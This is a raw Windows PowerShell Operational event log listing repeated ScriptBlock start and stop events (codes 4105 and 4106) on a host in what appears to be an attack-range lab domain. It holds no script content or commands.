06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474566
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474565
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474564
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474563
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474562
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474561
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474560
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474559
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474558
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474557
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474556
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474555
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474554
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474553
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474552
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474551
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474550
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474549
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474548
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474547
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474546
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474545
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474544
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474543
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474542
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474541
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474540
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474539
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474538
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474537
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474536
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474535
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474534
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474533
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474532
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474531
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474530
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474529
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474528
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474527
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474526
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474525
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474524
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474523
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474522
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474521
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474520
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474519
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474518
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474517
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474516
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474515
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474514
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474513
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474512
Keywords=None
